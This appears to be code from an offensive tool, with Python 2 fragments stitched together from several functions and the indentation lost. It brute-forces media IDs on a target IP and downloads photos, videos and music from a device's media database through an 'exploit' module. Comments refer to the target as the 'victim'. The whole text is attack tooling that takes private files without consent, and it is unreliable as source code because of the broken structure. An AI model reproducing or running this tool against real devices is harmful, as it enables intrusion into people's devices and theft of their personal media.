def __init__(self):
self.filename = "{0}.txt".format(datetime.now().strftime("%Y-%m-%d"))
realpath = helper.translate_path(self.logdir)
if not os.path.isdir(realpath):
try:
helper.mkdir(realpath)
except Exception as e:
print 'Unable to create log directory'
self.filepath = os.path.join(realpath,self.filename)
def brute_media(target,mediatype = 'photo', id_from=0, id_to=2000, id_step=20,retry=0):
download_path = helper.translate_path('tmp/data/{0}/{1}/media/{2}/thumbnail'.format(clean_target_network, clean_target_ip,mediatype))
if not os.path.isdir(download_path):
helper.mkdir(download_path)
print '[*] Bruteforcing from {0} to {1}'.format(str(id_from),str(id_to))
data = exploit.brute_assets(target,download_path, mediatype, id_from, id_to, id_step)
print data
#if len(data) > 0 or retry >= max_bruteforce_retries:
oldfrom = id_from
id_from = id_to + 1;
id_to = 2 * id_to - oldfrom;
found = len(get_thumbs(mediatype))
limit = files_max_download[mediatype] if mediatype in files_max_download else files_max_download['other']
if id_from < brute_id_max and found < limit and exploit.is_reachable(target):
brute_media(target,mediatype,id_from,id_to,id_step)
return len(get_thumbs(mediatype))
def download_media_from_db(target,mediatype = 'photo',file_format = 'thumbnail'):
download_path = helper.translate_path('tmp/data/{0}/{1}/media/{2}/{3}'.format(clean_target_network, clean_target_ip,mediatype,file_format))
if not os.path.isdir(download_path):
helper.mkdir(download_path)
media_db_result = exploit.list_media_from_db(target, mediatype)
if media_db_result is not None and media_db_result > 0:
logger.info('MediaDB data: ' + json.dumps(media_db_result))
try:
if file_format == 'thumbnail':
asset_ids = media_db_result.keys()
requested_file_type = mediatype
else:
asset_ids = [file['path'] for file in media_db_result.itervalues()]
requested_file_type = 'file'
result = exploit.download_multi_assets(target,download_path,requested_file_type,asset_ids,file_format)
if result is not None and len(result) > 0:
logger.success('Downloaded {0} {1}s from %s mediadb'.format(mediatype, file_format, target))
except Exception as e:
print e
pass
return media_db_result
def brute_files(self, page, qs):
response = RequestHandler.empty_response.copy()
json_output = RequestHandler.json_output.copy()
self.session['brute_success'] = self.session[
'brute_success'] if 'brute_success' in self.session else {}
allowed_types = ['photo', 'video', 'music']
file_type = str(qs['album'][0]) if 'album' in qs else 'photo'
file_format = 'thumbnail' if file_type in exploit.assets_with_thumbs else 'raw'
ip = str(qs['ip'][0]) if 'ip' in qs else False
try:
id_from = int(qs['from'][0]) if 'from' in qs else 1
except Exception:
id_from = 1
try:
id_to = int(qs['to'][0]) if 'to' in qs else 2000
except Exception:
id_to = 2000
try:
id_step = int(qs['step'][0]) if 'step' in qs else 20
except Exception:
id_step = 20
if ip == False:
json_output['status'] = 'error'
json_output['msg'] = 'missing IP'
elif not re.match(r'^(?:\d{1,3}\.){3}\d{1,3}$', ip):
json_output['status'] = 'error'
json_output['msg'] = 'Invalid IP'
elif file_type not in allowed_types:
json_output['status'] = 'error'
json_output['msg'] = 'Unsupported album'
else:
data = []
identifier = '%s_%s_%s_%s_%s' % (ip, file_type, str(id_from),
str(id_to), str(id_step))
if identifier not in self.session['brute_success'].keys():
path = '/tmp/%s/%s/%s' % (self.session_id, ip, file_type)
path += '/thumbs' if file_format == 'thumbnail' else '/data'
realpath = self.translate_path(path)
try:
if not os.path.isdir(realpath):
helper.mkdir(realpath)
except Exception:
response['status'] = 'error'
response[
'msg'] = 'Unable to create directory to save files, make sure we have sufficient permissions'
realpath = None
if realpath is not None:
data = exploit.brute_assets(ip, realpath, file_type,
id_from, id_to, id_step)
if len(data) > 0:
#record successful retrieval to avoid hammering victim with dupes
self.session['brute_success'][identifier] = len(data)
json_output['data'] = len(data)
else:
json_output['data'] = self.session['brute_success'][identifier]
response['headers'] = {
'Content-Type': 'application/json; charset=utf-8'
}
response['content'] = json.dumps(json_output)
self.send_ok(response)
def get_media_files(self, page, qs):
response = RequestHandler.empty_response.copy()
json_output = RequestHandler.json_output.copy()
self.session['media_success'] = self.session[
'media_success'] if 'media_success' in self.session else {}
#allowed_types = ['photo','video','music']
file_type = str(qs['album'][0]) if 'album' in qs else 'photo'
file_format = 'thumbnail' if file_type in exploit.assets_with_thumbs else 'raw'
ip = str(qs['ip'][0]) if 'ip' in qs else False
if ip == False:
json_output['status'] = 'error'
json_output['msg'] = 'missing IP'
elif not re.match(r'^(?:\d{1,3}\.){3}\d{1,3}$', ip):
json_output['status'] = 'error'
json_output['msg'] = 'Invalid IP'
"""
elif file_type not in allowed_types:
json_output['status'] = 'error'
json_output['msg'] = 'Unsupported album'
"""
else:
data = {"found": 0, "downloaded": False}
identifier = '%s_%s' % (ip, file_type)
if identifier not in self.session['media_success'].keys():
path = '/tmp/%s/%s/%s' % (self.session_id, ip, file_type)
path += '/thumbs' if file_format == 'thumbnail' else '/data'
realpath = self.translate_path(path)
try:
if not os.path.isdir(realpath):
helper.mkdir(realpath)
except Exception:
response['status'] = 'error'
response[
'msg'] = 'Unable to create directory to save files, make sure we have sufficient permissions'
realpath = None
if realpath is not None:
data['found'] = exploit.list_media_from_db(ip, file_type)
if data['found'] is not None and len(data['found']) > 0:
self.session['media_success'][identifier] = data
try:
if file_format == 'thumbnail':
asset_ids = data['found'].keys()
requested_file_type = file_type
else:
asset_ids = [
file['path']
for file in data['found'].itervalues()
]
requested_file_type = 'file'
result = exploit.download_multi_assets(
ip, realpath, requested_file_type, asset_ids,
file_format)
if result is not None and len(result) > 0:
data['downloaded'] = True
#record successful retrieval to avoid hammering victim with dupes
self.session['media_success'][
identifier] = data
except Exception as e:
print e
pass
#else:
#If there are no files in mediadb of this type or media db does not exist, just record it as a successful attempt
#self.session['media_success'][identifier] = data
json_output['data'] = data
else:
json_output['data'] = self.session['media_success'][identifier]
response['headers'] = {
'Content-Type': 'application/json; charset=utf-8'
}
response['content'] = json.dumps(json_output)
self.send_ok(response)